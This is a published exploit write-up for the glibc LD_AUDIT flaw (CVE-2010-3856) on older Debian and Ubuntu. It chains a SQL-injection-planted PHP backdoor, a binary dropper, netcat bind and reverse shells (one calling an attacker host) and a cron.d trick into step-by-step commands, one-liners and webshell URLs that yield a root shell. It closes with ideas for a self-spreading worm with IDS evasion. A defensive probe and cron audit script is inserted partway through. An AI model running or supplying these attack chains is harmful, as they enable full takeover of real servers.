# Exploit Title: Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
# Date: 24-10-2010
# Author: jmit
# Mail: fhausberger[at]gmail[dot]com
# Tested on: Debian 5.0.6
# CVE: CVE-2010-3856
--------------
| DISCLAIMER |
--------------
# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
---------
| ABOUT |
---------
Debian/Ubuntu remote root exploitation example using the GNU libc dynamic loader
LD_AUDIT vulnerability (CVE-2010-3856, called the "DSO vuln" in the rest of this text).
See (http://www.exploit-db.com/exploits/15304/) for the original advisory. It should
work on other Linux distributions whose glibc is unpatched.
--------------
| BACKGROUND |
--------------
Typically it isn't possible to gain root directly after webshell access (user nobody):
there is no suid shell to run and /etc/passwd is not writable. With the DSO vuln we can
run commands as root, and with them we can open a socket back to the attacker or set up
a bindshell.
-----------
| EXPLOIT |
-----------
After you have found a SQL injection vuln you can create a PHP backdoor. This is typically
possible with a SELECT ... INTO DUMPFILE/OUTFILE statement, provided the database user has
the MySQL FILE privilege and the webroot is writable by the mysqld process. The payload is a
simple <? passthru($_GET['c']); ?> backdoor, given as hex below so no quoting is needed.
---
DROP TABLE IF EXISTS `fm`;
CREATE TABLE `fm` (
`fm` longblob
) ENGINE=MyISAM;                 -- TYPE=MyISAM is the pre-MySQL-5.5 spelling
-- the hex literal decodes to: <? passthru($_GET['c']); ?>
insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);
select fm from fm into dumpfile '/opt/lampp/htdocs/xampp_backup.php';
drop table fm;
flush logs;
---
Now you can call the backdoor and open a connection with telnet or nc. If the target has
no nc, you can write the bytes of your own binary with perl -e 'print "\x41\x42\x43\x44"',
echo -en '\x41\x42\x43\x44', ... If direct shell access isn't possible you can use PHP code
to write the binary with fwrite:
---
<?php
$File = "/tmp/nc";
$Handle = fopen($File, 'w');
$Data = "\x41\x42\x43\x44";   // placeholder: the raw bytes of the binary to drop
fwrite($Handle, $Data);
fclose($Handle);
chmod($File, 0755);           // the dropped binary must be executable
?>
---
Now call one of
Bind-Shell: http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash
Reverse-Shell: http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 -e /bin/bash
in your web browser (for the reverse shell, start a listener on attackerip first with
nc -l -p 9999) and connect to your shell:
$ nc victimip 9999
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
---
Now let's exploit the DSO vuln. You need umask 0 so that the file the loader creates,
/etc/cron.d/exploit, comes out rw-rw-rw- and the unprivileged user can write to it:
$ umask 0
This is the shell script for the cron.d entry.
Bind-Shell: $ echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
Reverse-Shell: $ echo -e '/bin/nc localhost 8888 -e /bin/bash' > /tmp/exploit.sh
(for the reverse variant, first start a listener from the nobody shell: nc -l -p 8888)
Now make your shell script executable for cron:
$ chmod u+x /tmp/exploit.sh
Create the world-writable, root-owned file in the cron directory using the setuid ping program.
The vulnerable loader honours LD_AUDIT for the setuid binary, so libpcprofile.so creates the
file named by PCPROFILE_OUTPUT with root privileges; ping itself only prints its usage and exits:
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
Make cron run the script as root every minute (port 79 is a privileged port, which is fine
because the cron job runs as root):
$ echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
Within a minute cron runs the script as root and you have your root shell:
$ nc victimip 79
id
uid=0(root) gid=0(root) groups=0(root)
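The following is an added defender-side check, not part of the original advisory: it probes whether
the dynamic loader still honours LD_AUDIT for a setuid-root binary (the behaviour abused above) without
touching anything outside a private temp dir, and it audits a cron.d directory for the kind of file the
technique leaves behind (root-owned but group/other writable, as created with umask 0). It assumes a
stat(1) that accepts -c (GNU or busybox), that libpcprofile.so is on the loader's default search path
(it ships with glibc), and that the probe is run as an unprivileged user. The /bin/ping path and the
/etc/cron.d default are only illustrative.

```shell
#!/bin/sh
# Added check script (not from the original advisory). Assumes: stat -c, an
# unprivileged caller, libpcprofile.so reachable via the default library path.

# is_setuid_root FILE -> exit 0 if FILE is setuid and owned by uid 0
is_setuid_root() {
    [ -u "$1" ] && [ "$(stat -c %u "$1")" = 0 ]
}

# ld_audit_probe BIN -> prints VULNERABLE, NOT_VULNERABLE or SKIPPED.
# Runs BIN with LD_AUDIT=libpcprofile.so and PCPROFILE_OUTPUT pointing into a
# private temp dir. BIN gets no arguments, so ping-style tools print usage and
# exit. A patched loader ignores LD_AUDIT for setuid programs and no file
# appears; a vulnerable one lets libpcprofile.so create it as root.
ld_audit_probe() {
    bin=$1
    if ! is_setuid_root "$bin"; then
        echo SKIPPED            # only a setuid-root binary tells us anything
        return 2
    fi
    if [ "$(id -u)" = 0 ]; then
        echo SKIPPED            # as root the file is root-owned either way
        return 2
    fi
    dir=$(mktemp -d) || return 2
    out="$dir/pcprofile.out"
    LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$out" "$bin" >/dev/null 2>&1 || true
    if [ -f "$out" ] && [ "$(stat -c %u "$out")" = 0 ]; then
        rm -rf "$dir"
        echo VULNERABLE
        return 0
    fi
    rm -rf "$dir"
    echo NOT_VULNERABLE
    return 1
}

# mode_is_shared_writable MODE -> exit 0 if the octal MODE (as printed by
# stat -c %a, e.g. 644 or 4755) has the write bit set for group or other.
mode_is_shared_writable() {
    mode=$1
    oth=${mode#"${mode%?}"}              # last octal digit  (other)
    rest=${mode%?}
    grp=${rest#"${rest%?}"}              # second-to-last digit (group)
    [ $((grp & 2)) -ne 0 ] || [ $((oth & 2)) -ne 0 ]
}

# insecure_crond DIR -> prints one line per file in DIR (default /etc/cron.d)
# that cron should never trust: not owned by root, or group/other writable.
# Exit 0 if any such file exists, 1 otherwise.
insecure_crond() {
    dir=${1:-/etc/cron.d}
    found=1
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        owner=$(stat -c %u "$f")
        mode=$(stat -c %a "$f")
        if [ "$owner" != 0 ]; then
            echo "$f owner=$owner mode=$mode not-root-owned"
            found=0
        elif mode_is_shared_writable "$mode"; then
            echo "$f owner=$owner mode=$mode writable-by-others"
            found=0
        fi
    done
    return $found
}

# Usage (illustrative paths): ld_audit_probe /bin/ping; insecure_crond /etc/cron.d
```

A VULNERABLE result means the root-owned probe file appeared, i.e. the loader ran libpcprofile.so inside
a setuid process; on a patched glibc no file is created at all. The cron.d audit flags both conditions
the exploit relies on, the umask-0 world-writable mode and a non-root owner, and is safe to run on a
live host since it only reads metadata.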
-------------------
| EXPLOIT oneline |
-------------------
echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
$ nc victimip 79
id
uid=0(root) gid=0(root) groups=0(root)
------------------------------
| EXPLOIT from webshell only |
------------------------------
http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
http://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh
http://victimip/xampp_backup.php?c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
http://victimip/xampp_backup.php?c=echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
$ nc victimip 79
id
uid=0(root) gid=0(root) groups=0(root)
---------------------------------
| EXPLOIT from webshell oneline |
---------------------------------
http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
$ nc victimip 79
id
uid=0(root) gid=0(root) groups=0(root)
---------
| IDEAS |
---------
Looks like a wormable bug. A worm with URL obfuscation (to evade IDS/IPS) searches for SQLi/blind SQLi bugs or remote code execution bugs,
injects the evil URL, and then does the same against other IPs. It installs a rootkit/bot and the game is over.